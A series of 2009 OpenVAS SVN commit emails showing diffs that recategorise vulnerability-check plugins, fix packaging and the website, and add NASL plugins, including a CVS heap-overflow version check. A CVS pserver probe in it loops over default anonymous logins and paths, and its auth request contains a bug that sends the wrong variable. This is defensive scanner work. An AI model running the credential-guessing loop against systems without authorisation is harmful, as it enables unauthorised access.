trunk/openvas-plugins/scripts/secpod_mcafee_encrypt_usb_mngr_sec_bypass_vuln_900026.nasl 2009-10-05 10:31:15 UTC (rev 5371) +++ trunk/openvas-plugins/scripts/secpod_mcafee_encrypt_usb_mngr_sec_bypass_vuln_900026.nasl 2009-10-05 10:46:42 UTC (rev 5372) @@ -30,7 +30,7 @@ script_copyright("Copyright (C) 2008 SecPod"); script_version("$Revision: 1.1 $"); script_category(ACT_GATHER_INFO); - script_family("Misc."); + script_family("Brute force attacks"); script_name("McAfee Encrypted USB Manager Remote Security Bypass Vulnerability"); script_summary("Check for the version of McAfee Encrypted USB Manager"); desc = " Modified: trunk/openvas-plugins/scripts/secpod_nms_dvd_burning_sdk_actvx_vuln_900132.nasl =================================================================== --- trunk/openvas-plugins/scripts/secpod_nms_dvd_burning_sdk_actvx_vuln_900132.nasl 2009-10-05 10:31:15 UTC (rev 5371) +++ trunk/openvas-plugins/scripts/secpod_nms_dvd_burning_sdk_actvx_vuln_900132.nasl 2009-10-05 10:46:42 UTC (rev 5372) @@ -29,7 +29,7 @@ script_copyright("Copyright (C) 2008 SecPod"); script_version("Revision: 1.1 "); script_category(ACT_GATHER_INFO); - script_family("Misc."); + script_family("General"); script_name("NuMedia Soft DVD Burning SDK Activex Control Remote Code Execution Vulnerability"); script_summary("Check for vulnerable version of CDBurnerXP"); desc = " Modified: trunk/openvas-plugins/scripts/secpod_python_mult_vuln_win_900105.nasl =================================================================== --- trunk/openvas-plugins/scripts/secpod_python_mult_vuln_win_900105.nasl 2009-10-05 10:31:15 UTC (rev 5371) +++ trunk/openvas-plugins/scripts/secpod_python_mult_vuln_win_900105.nasl 2009-10-05 10:46:42 UTC (rev 5372) @@ -32,7 +32,7 @@ script_copyright("Copyright (C) 2008 SecPod"); script_version("$Revision: 1.1 $"); script_category(ACT_GATHER_INFO); - script_family("Misc."); + script_family("Buffer overflow"); script_name("Python Multiple Vulnerabilities (Win)"); script_summary("Check for vulnerable version of Pyhton"); desc = " Modified: trunk/openvas-plugins/scripts/secpod_trendmicro_officescan_auth_bypass_vuln_900205.nasl =================================================================== --- trunk/openvas-plugins/scripts/secpod_trendmicro_officescan_auth_bypass_vuln_900205.nasl 2009-10-05 10:31:15 UTC (rev 5371) +++ trunk/openvas-plugins/scripts/secpod_trendmicro_officescan_auth_bypass_vuln_900205.nasl 2009-10-05 10:46:42 UTC (rev 5372) @@ -31,7 +31,7 @@ script_copyright("Copyright (C) 2008 SecPod"); script_version("$Revision: 1.1 $"); script_category(ACT_GATHER_INFO); - script_family("Misc."); + script_family("Privilege escalation"); script_name("Trend Micro Web Management Authentication Bypass Vulnerability"); script_summary("Check for the version of Trend Micro OfficeScan"); desc = " Modified: trunk/openvas-plugins/scripts/secpod_trendmicro_officescan_cgiparsing_bof_vuln_900164.nasl =================================================================== --- trunk/openvas-plugins/scripts/secpod_trendmicro_officescan_cgiparsing_bof_vuln_900164.nasl 2009-10-05 10:31:15 UTC (rev 5371) +++ trunk/openvas-plugins/scripts/secpod_trendmicro_officescan_cgiparsing_bof_vuln_900164.nasl 2009-10-05 10:46:42 UTC (rev 5372) @@ -30,7 +30,7 @@ script_copyright("Copyright (C) 2008 SecPod"); script_version("Revision: 1.0 "); script_category(ACT_GATHER_INFO); - script_family("Misc."); + script_family("Buffer overflow"); script_name("Trend Micro OfficeScan CGI Parsing Buffer Overflow Vulnerability"); script_summary("Check for vulnerable version of Trend Micro OfficeScan"); desc = " Modified: trunk/openvas-plugins/scripts/secpod_wireshark_mult_vuln_july08_lin_900011.nasl =================================================================== --- trunk/openvas-plugins/scripts/secpod_wireshark_mult_vuln_july08_lin_900011.nasl 2009-10-05 10:31:15 UTC (rev 5371) +++ trunk/openvas-plugins/scripts/secpod_wireshark_mult_vuln_july08_lin_900011.nasl 2009-10-05 10:46:42 UTC (rev 5372) @@ -31,7 +31,7 @@ script_copyright("Copyright (C) 2008 SecPod"); script_version("Revision: 1.4 "); script_category(ACT_GATHER_INFO); - script_family("Misc."); + script_family("General"); script_name("Wireshark Multiple Vulnerabilities - July08 (Linux)"); script_summary("Check for vulnerable version of Wireshark/Ethereal"); desc = " Modified: trunk/openvas-plugins/scripts/secpod_xine-lib_mult_code_exe_dos_vuln_900111.nasl =================================================================== --- trunk/openvas-plugins/scripts/secpod_xine-lib_mult_code_exe_dos_vuln_900111.nasl 2009-10-05 10:31:15 UTC (rev 5371) +++ trunk/openvas-plugins/scripts/secpod_xine-lib_mult_code_exe_dos_vuln_900111.nasl 2009-10-05 10:46:42 UTC (rev 5372) @@ -30,7 +30,7 @@ script_copyright("Copyright (C) 2008 SecPod"); script_version("Revision: 1.2 "); script_category(ACT_GATHER_INFO); - script_family("Misc."); + script_family("General"); script_name("xine-lib Multiple Vulnerabilities"); script_summary("Check for vulnerable version of xine-lib"); desc = " Modified: trunk/openvas-plugins/scripts/secpod_xine-lib_mult_vuln_aug08_900041.nasl =================================================================== --- trunk/openvas-plugins/scripts/secpod_xine-lib_mult_vuln_aug08_900041.nasl 2009-10-05 10:31:15 UTC (rev 5371) +++ trunk/openvas-plugins/scripts/secpod_xine-lib_mult_vuln_aug08_900041.nasl 2009-10-05 10:46:42 UTC (rev 5372) @@ -29,7 +29,7 @@ script_copyright("Copyright (C) 2008 SecPod"); script_version("Revision: 1.3 "); script_category(ACT_GATHER_INFO); - script_family("Misc."); + script_family("Buffer overflow"); script_name("xine-lib Multiple Vulnerabilities (Aug-08)"); script_summary("Check for vulnerable version of xine-lib"); desc = " Modified: trunk/openvas-plugins/scripts/smc2804wbr_default_password.nasl =================================================================== --- trunk/openvas-plugins/scripts/smc2804wbr_default_password.nasl 2009-10-05 10:31:15 UTC (rev 5371) +++ trunk/openvas-plugins/scripts/smc2804wbr_default_password.nasl 2009-10-05 10:46:42 UTC (rev 5372) @@ -34,7 +34,7 @@ script_category(ACT_GATHER_INFO); script_copyright("This script is Copyright (C) 2004 Audun Larsen"); - family = "Misc."; + family = "Privilege escalation"; script_family(family); script_dependencie("find_service.nes", "http_version.nasl"); script_require_ports("Services/www", 80); Modified: trunk/openvas-plugins/scripts/websense_detect.nasl =================================================================== --- trunk/openvas-plugins/scripts/websense_detect.nasl 2009-10-05 10:31:15 UTC (rev 5371) +++ trunk/openvas-plugins/scripts/websense_detect.nasl 2009-10-05 10:46:42 UTC (rev 5372) @@ -31,7 +31,7 @@ script_copyright("This script is Copyright (C) 2005 David Maciejak"); - family = "Misc."; + family = "Service detection"; script_family(family); script_dependencie("httpver.nasl"); Modified: trunk/openvas-plugins/scripts/webshield_detect.nasl =================================================================== --- trunk/openvas-plugins/scripts/webshield_detect.nasl 2009-10-05 10:31:15 UTC (rev 5371) +++ trunk/openvas-plugins/scripts/webshield_detect.nasl 2009-10-05 10:46:42 UTC (rev 5372) @@ -34,7 +34,7 @@ script_copyright("This script is Copyright (C) 2005 David Maciejak"); - family = "Misc."; + family = "Brute force attacks"; script_family(family); script_dependencie("http_version.nasl"); Modified: trunk/openvas-plugins/scripts/zyxel_pwd.nasl =================================================================== --- trunk/openvas-plugins/scripts/zyxel_pwd.nasl 2009-10-05 10:31:15 UTC (rev 5371) +++ trunk/openvas-plugins/scripts/zyxel_pwd.nasl 2009-10-05 10:46:42 UTC (rev 5372) @@ -38,7 +38,7 @@ script_category(ACT_GATHER_INFO); script_copyright("This script is Copyright (C) 2001 Giovanni Fiaschi"); - script_family("Misc."); + script_family("Privilege escalation"); script_require_ports(23); exit(0); From scm-commit at wald.intevation.org Mon Oct 5 14:47:13 2009 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Mon, 5 Oct 2009 14:47:13 +0200 (CEST) Subject: [Openvas-commits] r5373 - trunk/openvas-packaging/openvas-scanner/debian/trunk/debian Message-ID: <20091005124713.5875B85C72FF@pyrosoma.intevation.org> Author: mwiegand Date: 2009-10-05 14:47:12 +0200 (Mon, 05 Oct 2009) New Revision: 5373 Modified: trunk/openvas-packaging/openvas-scanner/debian/trunk/debian/changelog trunk/openvas-packaging/openvas-scanner/debian/trunk/debian/openvas-scanner.dirs trunk/openvas-packaging/openvas-scanner/debian/trunk/debian/openvas-scanner.install Log: * Make sure the C based NVTs (CNVTs) are actually installed. Modified: trunk/openvas-packaging/openvas-scanner/debian/trunk/debian/changelog =================================================================== --- trunk/openvas-packaging/openvas-scanner/debian/trunk/debian/changelog 2009-10-05 10:46:42 UTC (rev 5372) +++ trunk/openvas-packaging/openvas-scanner/debian/trunk/debian/changelog 2009-10-05 12:47:12 UTC (rev 5373) @@ -1,3 +1,9 @@ +openvas-scanner (3.0.0.beta2-2) UNRELEASED; urgency=low + + * Make sure the C based NVTs (CNVTs) are actually installed. + + -- Michael Wiegand Mon, 05 Oct 2009 14:42:51 +0200 + openvas-scanner (3.0.0.beta2-1) UNRELEASED; urgency=low * New upstream release. Modified: trunk/openvas-packaging/openvas-scanner/debian/trunk/debian/openvas-scanner.dirs =================================================================== --- trunk/openvas-packaging/openvas-scanner/debian/trunk/debian/openvas-scanner.dirs 2009-10-05 10:46:42 UTC (rev 5372) +++ trunk/openvas-packaging/openvas-scanner/debian/trunk/debian/openvas-scanner.dirs 2009-10-05 12:47:12 UTC (rev 5373) @@ -7,6 +7,7 @@ var/lib/openvas var/lib/openvas/CA var/lib/openvas/private/CA +var/lib/openvas/plugins var/log/openvas var/cache/openvas etc/openvas Modified: trunk/openvas-packaging/openvas-scanner/debian/trunk/debian/openvas-scanner.install =================================================================== --- trunk/openvas-packaging/openvas-scanner/debian/trunk/debian/openvas-scanner.install 2009-10-05 10:46:42 UTC (rev 5372) +++ trunk/openvas-packaging/openvas-scanner/debian/trunk/debian/openvas-scanner.install 2009-10-05 12:47:12 UTC (rev 5373) @@ -5,4 +5,5 @@ usr/share/man/man1/openvas-mkrand.1 usr/share/man/man8/* var/lib/openvas/openvas-services +var/lib/openvas/plugins etc/openvas/openvassd.conf From scm-commit at wald.intevation.org Mon Oct 5 15:29:51 2009 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Mon, 5 Oct 2009 15:29:51 +0200 (CEST) Subject: [Openvas-commits] r5374 - trunk/openvas-packaging/openvas-scanner/debian/trunk/debian Message-ID: <20091005132951.7FD22852FD79@pyrosoma.intevation.org> Author: mwiegand Date: 2009-10-05 15:29:49 +0200 (Mon, 05 Oct 2009) New Revision: 5374 Modified: trunk/openvas-packaging/openvas-scanner/debian/trunk/debian/openvas-scanner.install Log: Correct the install entry to list files, not the directory. Modified: trunk/openvas-packaging/openvas-scanner/debian/trunk/debian/openvas-scanner.install =================================================================== --- trunk/openvas-packaging/openvas-scanner/debian/trunk/debian/openvas-scanner.install 2009-10-05 12:47:12 UTC (rev 5373) +++ trunk/openvas-packaging/openvas-scanner/debian/trunk/debian/openvas-scanner.install 2009-10-05 13:29:49 UTC (rev 5374) @@ -5,5 +5,5 @@ usr/share/man/man1/openvas-mkrand.1 usr/share/man/man8/* var/lib/openvas/openvas-services -var/lib/openvas/plugins +var/lib/openvas/plugins/* etc/openvas/openvassd.conf From scm-commit at wald.intevation.org Mon Oct 5 15:53:33 2009 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Mon, 5 Oct 2009 15:53:33 +0200 (CEST) Subject: [Openvas-commits] r5375 - trunk/doc/website Message-ID: <20091005135333.AAAAD852B6CC@pyrosoma.intevation.org> Author: jan Date: 2009-10-05 15:53:32 +0200 (Mon, 05 Oct 2009) New Revision: 5375 Modified: trunk/doc/website/openvas-server.htm4 trunk/doc/website/template_header.m4 Log: Updating website with some hints/consideration of the 3.0 Beta. Modified: trunk/doc/website/openvas-server.htm4 =================================================================== --- trunk/doc/website/openvas-server.htm4 2009-10-05 13:29:49 UTC (rev 5374) +++ trunk/doc/website/openvas-server.htm4 2009-10-05 13:53:32 UTC (rev 5375) @@ -6,10 +6,10 @@ m4_dnl Description: Overview on OpenVAS-Server Software m4_dnl m4_dnl Authors: -m4_dnl Jan-Oliver Wagner +m4_dnl Jan-Oliver Wagner m4_dnl m4_dnl Copyright: -m4_dnl Copyright (C) 2007, 2008 Intevation GmbH +m4_dnl Copyright (C) 2007, 2008, 2009 Greenbone Networks GmbH m4_dnl m4_dnl This program is free software; you can redistribute it and/or modify m4_dnl it under the terms of the GNU General Public License version 2, @@ -39,11 +39,18 @@

-The server consists of 4 modules: openvas-libraries, openvas-libnasl, openvas-server +Release 2.0: The server consists of 4 modules: openvas-libraries, openvas-libnasl, openvas-server and openvas-plugins. All need to be installed for a fully functional server.

+Release 3.0 (Beta status!): The former "OpenVAS server" is now called the "OpenVAS Scanner" and +consists of 2 modules: openvas-libraries and openvas-scanner. The scanner is accompanied by the +optional servers "OpenVAS Manager" (module openvas-manager) and "OpenVAS Administrator" (module +openvas-administrator). +

+ + -

Readily available installation packages

+

Readily available installation packages (Version 2.0.x)

Please note: OpenVAS 2 series was released recently and may not yet be @@ -335,7 +342,7 @@ http://www.freshports.org.

-

Latest source code release

+

Latest source code release (Version 2.0.x)

The download link for the latest source code release can @@ -370,7 +377,7 @@ Repeat for each module and read the corresponding INSTALL or README files.

-

Most current state of development (directly from the source code management system)

+

Most current state of development (directly from the source code management system) (Version 2.0.x)

You need subversion to retrieve the code. @@ -378,13 +385,51 @@

+$ svn checkout https://svn.wald.intevation.org/svn/openvas/branches/openvas-libraries-2-0
+$ svn checkout https://svn.wald.intevation.org/svn/openvas/branches/openvas-libnasl-2-0
+$ svn checkout https://svn.wald.intevation.org/svn/openvas/branches/openvas-server-2-0
+$ svn checkout https://svn.wald.intevation.org/svn/openvas/trunk/openvas-plugins
+ +

+ +

+Now read the file INSTALL_README +inside the directory "openvas-libraries" for the next steps. +

+ +

+Do the same openvas-server module and read the corresponding INSTALL or README files. +

+ +

+Note for the SVN build: Although the OpenVAS team is committed to maintaining high code quality, please +be aware that you are using a development state that may be incomplete and +unstable and should not be used in production environments. +

+ +

Most current state of development (directly from the source code management system) (Version 3.0.x)

+ +

+You need subversion to retrieve the code. +

+ +

+ $ svn checkout https://svn.wald.intevation.org/svn/openvas/trunk/openvas-libraries
-$ svn checkout https://svn.wald.intevation.org/svn/openvas/trunk/openvas-server
+$ svn checkout https://svn.wald.intevation.org/svn/openvas/trunk/openvas-scanner

+

Optional:

+

-Now read the file INSTALL_README + +$ svn checkout https://svn.wald.intevation.org/svn/openvas/trunk/openvas-manager
+$ svn checkout https://svn.wald.intevation.org/svn/openvas/trunk/openvas-administrator
+ +

+ +Now read the file INSTALL_README inside the directory "openvas-libraries" for the next steps.

Modified: trunk/doc/website/template_header.m4 =================================================================== --- trunk/doc/website/template_header.m4 2009-10-05 13:29:49 UTC (rev 5374) +++ trunk/doc/website/template_header.m4 2009-10-05 13:53:32 UTC (rev 5375) @@ -175,6 +175,14 @@ PDF (de)

+

+ OpenVAS 3.0 BETA:
+ -libraries 3.0.0-beta2
+ -scanner 3.0.0-beta2
+ -client 3.0.0-beta1
+ Optional:
+ -manager 0.9.0
+ -administrator 0.2.0

From scm-commit at wald.intevation.org Mon Oct 5 19:43:10 2009 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Mon, 5 Oct 2009 19:43:10 +0200 (CEST) Subject: [Openvas-commits] r5376 - in trunk/openvas-plugins: . scripts Message-ID: <20091005174310.A0FE2852FD79@pyrosoma.intevation.org> Author: mime Date: 2009-10-05 19:43:01 +0200 (Mon, 05 Oct 2009) New Revision: 5376 Added: trunk/openvas-plugins/scripts/apcnisd_detect.nasl trunk/openvas-plugins/scripts/cvs_pserver_heap_overflow.nasl trunk/openvas-plugins/scripts/cvspserver_version.nasl trunk/openvas-plugins/scripts/ms_telnet_overflow.nasl trunk/openvas-plugins/scripts/sympa_detect.nasl Modified: trunk/openvas-plugins/ChangeLog trunk/openvas-plugins/scripts/cvs_file_existence_info_weak.nasl trunk/openvas-plugins/scripts/cvs_malformed_entry_lines_flaw.nasl trunk/openvas-plugins/scripts/http_header_name_format_string.nasl trunk/openvas-plugins/scripts/monkeyweb_post_DoS.nasl trunk/openvas-plugins/scripts/mssql_brute_force.nasl trunk/openvas-plugins/scripts/secpod_ibm_db2_detect_win_900218.nasl trunk/openvas-plugins/scripts/secpod_prochatrooms_dir_trav_n_xss_vuln.nasl trunk/openvas-plugins/scripts/sybase_blank_password.nasl trunk/openvas-plugins/scripts/webmirror.nasl Log: Added new plugins Modified: trunk/openvas-plugins/ChangeLog =================================================================== --- trunk/openvas-plugins/ChangeLog 2009-10-05 13:53:32 UTC (rev 5375) +++ trunk/openvas-plugins/ChangeLog 2009-10-05 17:43:01 UTC (rev 5376) @@ -1,3 +1,32 @@ +2009-10-05 Michael Meyer + + * scripts/cvspserver_version.nasl, + scripts/apcnisd_detect.nasl, + scripts/cvs_pserver_heap_overflow.nasl: + Added new plugins. + + * scripts/secpod_ibm_db2_detect_win_900218.nasl, + scripts/monkeyweb_post_DoS.nasl, + scripts/http_header_name_format_string.nasl, + scripts/secpod_prochatrooms_dir_trav_n_xss_vuln.nasl: + Bugfixes. + + * scripts/cvs_malformed_entry_lines_flaw.nasl, + scripts/cvs_file_existence_info_weak.nasl: + Added cvspserver_version.nasl as dependency. + + * scripts/webmirror.nasl: + Removed debug stuff. + + * scripts/sybase_blank_password.nasl, + scripts/mssql_brute_force.nasl: + Removed dependency "sybase_detect.nasl". Both scripts can do + their job without these dependency. + + * scripts/sympa_detect.nasl, + scripts/ms_telnet_overflow.nasl: + Added plugins developed by LSS Security Team. + 2009-10-05 Chandrashekhar B * scripts/gb_opera_cmd_exec_n_xss_vuln_lin.nasl, Added: trunk/openvas-plugins/scripts/apcnisd_detect.nasl =================================================================== --- trunk/openvas-plugins/scripts/apcnisd_detect.nasl 2009-10-05 13:53:32 UTC (rev 5375) +++ trunk/openvas-plugins/scripts/apcnisd_detect.nasl 2009-10-05 17:43:01 UTC (rev 5376) @@ -0,0 +1,78 @@ +############################################################################### +# OpenVAS Vulnerability Test +# $Id$ +# +# apcupsd and apcnisd Detection Detection +# +# Authors: +# Michael Meyer +# +# Copyright: +# Copyright (c) 2009 Greenbone Networks GmbH +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2 +# (or any later version), as published by the Free Software Foundation. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +############################################################################### + +if (description) +{ + script_id(100292); + script_version ("1.0-$Revision$"); + + desc = "Overview: + This host is running apcupsd or apcnisd . apcupsd and apcnisd + can be used for power mangement and controlling of APC's UPS + models. + + See also: + http://www.apcupsd.com/ + + Risk factor : None"; + + script_name("apcupsd and apcnisd Detection Detection"); + script_description(desc); + script_summary("Checks for the presence of apcupsd or apcnisd"); + script_category(ACT_GATHER_INFO); + script_family("Service detection"); + script_copyright("This script is Copyright (C) 2009 Greenbone Networks GmbH"); + script_dependencies("find_service.nes"); + script_require_ports("Services/unknown", 3551, 7000); + exit(0); +} + +include("misc_func.inc"); +include("global_settings.inc"); + +ports = make_list(7000, 3551); + +foreach port (ports) { + + if(!get_port_state(port))continue; + soc = open_sock_tcp(port); + if(!soc)continue; + req = raw_string(0x00, 0x06); + req += string("status"); + + send(socket:soc, data:req); + buf = recv(socket:soc, length:4096); + + if("APC" >< buf && "STATUS" >< buf) { + register_service(port:port, proto:"apcnisd"); + if(report_verbosity > 0) { + security_note(port:port); + exit(0); + } + } +} + +exit(0); Property changes on: trunk/openvas-plugins/scripts/apcnisd_detect.nasl ___________________________________________________________________ Name: svn:keywords + Id Revision Modified: trunk/openvas-plugins/scripts/cvs_file_existence_info_weak.nasl =================================================================== --- trunk/openvas-plugins/scripts/cvs_file_existence_info_weak.nasl 2009-10-05 13:53:32 UTC (rev 5375) +++ trunk/openvas-plugins/scripts/cvs_file_existence_info_weak.nasl 2009-10-05 17:43:01 UTC (rev 5376) @@ -43,8 +43,8 @@ script_copyright("This script is Copyright (C) 2004 David Maciejak"); family = "General"; script_family(family); - script_require_ports("Services/cvspserver", port); - script_dependencies("find_service.nes", "cvs_pserver_heap_overflow.nasl"); + script_require_ports("Services/cvspserver", 2401); + script_dependencies("find_service.nes", "cvspserver_version.nasl"); exit(0); } Modified: trunk/openvas-plugins/scripts/cvs_malformed_entry_lines_flaw.nasl =================================================================== --- trunk/openvas-plugins/scripts/cvs_malformed_entry_lines_flaw.nasl 2009-10-05 13:53:32 UTC (rev 5375) +++ trunk/openvas-plugins/scripts/cvs_malformed_entry_lines_flaw.nasl 2009-10-05 17:43:01 UTC (rev 5376) @@ -51,8 +51,8 @@ script_copyright("This script is Copyright (C) 2004 David Maciejak"); family = "General"; script_family(family); - script_require_ports("Services/cvspserver", port); - script_dependencies("find_service.nes", "cvs_pserver_heap_overflow.nasl"); + script_require_ports("Services/cvspserver", 2401); + script_dependencies("find_service.nes", "cvspserver_version.nasl"); exit(0); } Added: trunk/openvas-plugins/scripts/cvs_pserver_heap_overflow.nasl =================================================================== --- trunk/openvas-plugins/scripts/cvs_pserver_heap_overflow.nasl 2009-10-05 13:53:32 UTC (rev 5375) +++ trunk/openvas-plugins/scripts/cvs_pserver_heap_overflow.nasl 2009-10-05 17:43:01 UTC (rev 5376) @@ -0,0 +1,94 @@ +############################################################################### +# OpenVAS Vulnerability Test +# $Id$ +# +# CVS Malformed Entry Modified and Unchanged Flag Insertion Heap Overflow Vulnerability +# +# Authors: +# Michael Meyer +# +# Copyright: +# Copyright (c) 2009 Greenbone Networks GmbH +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2 +# (or any later version), as published by the Free Software Foundation. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +############################################################################### + +if (description) +{ + script_id(100289); + script_bugtraq_id(10384); + script_cve_id("CVE-2004-0396"); + script_version ("1.0-$Revision$"); + + script_name("CVS Malformed Entry Modified and Unchanged Flag Insertion Heap Overflow Vulnerability"); + +desc = "Overview: +CVS is prone to a remote heap overflow vulnerability. This issue +presents itself during the handling of user-supplied input for entry +lines with 'modified' and 'unchanged' flags. This vulnerability can +allow an attacker to overflow a vulnerable buffer on the heap, +possibly leading to arbitrary code execution. + +CVS versions 1.11.15 and prior and CVS feature versions 1.12.7 and +prior are prone to this issue. + +**UPDATE: Symantec has confirmed that this vulnerability is being +actively exploited in the wild. Administrators are urged to +upgrade and block external access to potentially vulnerable +servers, if possible. + +Solution: +CVS versions 1.11.16 and 1.12.8 have been released to address +this issue. + +References: +http://www.securityfocus.com/bid/10384 +http://security.e-matters.de/advisories/072004.html?SID=384b888de96e3bce19306db8577fca26 +http://support.coresecurity.com/impact/exploits/62024ecea12fe1bbd01479065b3a1797.html +http://ccvs.cvshome.org/ +http://marc.theaimsgroup.com/?l=openbsd-security-announce&m=108508894405639&w=2 +http://rhn.redhat.com/errata/RHSA-2004-190.html +http://www.us-cert.gov/cas/techalerts/TA04-147A.html + +Risk factor : Medium"; + + script_description(desc); + script_summary("Determine if CVS is prone to a remote heap overflow vulnerability"); + script_category(ACT_GATHER_INFO); + script_family("General"); + script_copyright("This script is Copyright (C) 2009 Greenbone Networks GmbH"); + script_dependencies("cvspserver_version.nasl"); + script_require_ports("Services/cvspserver", 2401); + exit(0); +} + +include("version_func.inc"); + +port = get_kb_item("Services/cvspserver"); +if(!port)port = 2401; + +if(!get_port_state(port))exit(0); + +if(!version = get_kb_item(string("cvs/", port, "/version")))exit(0); +if(!isnull(version)) { + + if(version_is_less(version: version, test_version: "1.11.15") || + version_in_range(version: version, test_version: "1.12", test_version2: "1.12.7")) { + security_warning(port:port); + exit(0); + } + +} + +exit(0); Property changes on: trunk/openvas-plugins/scripts/cvs_pserver_heap_overflow.nasl ___________________________________________________________________ Name: svn:keywords + Id Revision Added: trunk/openvas-plugins/scripts/cvspserver_version.nasl =================================================================== --- trunk/openvas-plugins/scripts/cvspserver_version.nasl 2009-10-05 13:53:32 UTC (rev 5375) +++ trunk/openvas-plugins/scripts/cvspserver_version.nasl 2009-10-05 17:43:01 UTC (rev 5376) @@ -0,0 +1,97 @@ +############################################################################### +# OpenVAS Vulnerability Test +# $Id$ +# +# CVS pserver version Detection +# +# Authors: +# Michael Meyer +# +# Copyright: +# Copyright (c) 2009 Greenbone Networks GmbH +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2 +# (or any later version), as published by the Free Software Foundation. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +############################################################################### + +if (description) +{ + script_id(100288); + script_version ("1.0-$Revision$"); + + script_name("CVS pserver version"); + + desc = "Overview : This script retrieves the version of CVS pserver + and saves the result in KB. + + Risk factor : Informational"; + + script_description(desc); + script_summary("Set Version of CVS pserver in KB"); + script_category(ACT_GATHER_INFO); + script_family("Service detection"); + script_copyright("This script is Copyright (C) 2009 Greenbone Networks GmbH"); + script_dependencies("find_service.nes"); + script_require_ports("Services/cvspserver", 2401); + exit(0); +} + +port = get_kb_item("Services/cvspserver"); +if(!port)port = 2401; +if(!get_port_state(port))exit(0); + +logins = make_list("anonymous", "anoncvs"); +passwords = make_list("","anoncvs", "anon"); +dirs = make_list("/var/lib/cvsd/","/cvs", "/cvsroot", "/home/ncvs", "/usr/local/cvs"); + +foreach dir (dirs) { + foreach login (logins) { + foreach password (passwords) { + + soc = open_sock_tcp(port); + if(!soc)exit(0); + + req = string("BEGIN AUTH REQUEST\n", dir, "\n", login,"\n", "A", pass,"\n", "END AUTH REQUEST\n"); + send(socket:soc, data:req); + buf = recv_line(socket:soc, length:4096); + + if("I LOVE YOU" >< buf) { + + set_kb_item(name:string("cvs/", port, "/login"), value:login); + set_kb_item(name:string("cvs/", port, "/pass"), value:password); + set_kb_item(name:string("cvs/", port, "/dir"), value:dir); + + send(socket:soc, data:string("Root ", dir, "\nversion\n")); + buf = recv_line(socket:soc, length:4096); + + if(egrep(string: buf, pattern: "CVS", icase:TRUE)) { + + version = eregmatch(string:buf, pattern:"([0-9.]+)"); + + if(!isnull(version[1])) { + set_kb_item(name:string("cvs/", port, "/version"), value:version[1]); + exit(0); + } else { + exit(0);; + } + } else { + exit(0); + } + } else { + continue; + } + } + } +} + +exit(0); Property changes on: trunk/openvas-plugins/scripts/cvspserver_version.nasl ___________________________________________________________________ Name: svn:keywords + Id Revision Modified: trunk/openvas-plugins/scripts/http_header_name_format_string.nasl =================================================================== --- trunk/openvas-plugins/scripts/http_header_name_format_string.nasl 2009-10-05 13:53:32 UTC (rev 5375) +++ trunk/openvas-plugins/scripts/http_header_name_format_string.nasl 2009-10-05 17:43:01 UTC (rev 5376) @@ -51,8 +51,7 @@ if (! get_port_state(port)) exit(0); if (http_is_dead(port: port)) exit(0); -req = http_get(item: strcat("/openvas", rand_str(), ".html"), - "Host: ", get_host_name(), port: port); +req = http_get(item: strcat("/openvas", rand_str(), ".html"), port: port); soc = http_open_socket(port); if (! soc) exit(0); Modified: trunk/openvas-plugins/scripts/monkeyweb_post_DoS.nasl =================================================================== --- trunk/openvas-plugins/scripts/monkeyweb_post_DoS.nasl 2009-10-05 13:53:32 UTC (rev 5375) +++ trunk/openvas-plugins/scripts/monkeyweb_post_DoS.nasl 2009-10-05 17:43:01 UTC (rev 5376) @@ -59,8 +59,7 @@ soc = http_open_socket(port); if (! soc) exit(0); -r = http_post(item: "/", "Host: ", get_host_name(), - port: port, data: ""); +r = http_post(item: "/", port: port, data: ""); r2 = ereg_replace(string: r, pattern: 'Content-Length:([ 0-9]+)', replace: 'Content-Length:'); if (r2 == r) # Did not match? Added: trunk/openvas-plugins/scripts/ms_telnet_overflow.nasl =================================================================== --- trunk/openvas-plugins/scripts/ms_telnet_overflow.nasl 2009-10-05 13:53:32 UTC (rev 5375) +++ trunk/openvas-plugins/scripts/ms_telnet_overflow.nasl 2009-10-05 17:43:01 UTC (rev 5376) @@ -0,0 +1,90 @@ +################################################################### +# OpenVAS Network Vulnerability Test +# $ID$ +# +# MS Telnet Overflow +# +# LSS-NVT-2009-008 +# +# Developed by LSS Security Team +# +# Copyright (C) 2009 LSS +# +# This program is free software: you can redistribute it and/or +# modify it under the terms of the GNU General Public License as +# published by the Free Software Foundation, either version 2 of +# the License, or (at your option) any later version. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public +# License along with this program. If not, see +# . +################################################################### + +if(description) +{ + script_id(102008); + script_version("1.0-$Revision$"); + script_bugtraq_id(4061); + script_cve_id("CVE-2002-0020"); + + name = "MS Telnet Overflow"; + script_name(name); + + desc = " +It is possible to crash remote telnet server via malformed protocol options. +This flaw may allow attackers to execute arbitrary code on the system. + +Solution: http://www.microsoft.com/technet/security/bulletin/ms02-004.mspx + +Risk factor :High +"; + + script_description(desc); + + summary = "Attempts to overflow the Telnet server buffer"; + script_summary(summary); + + 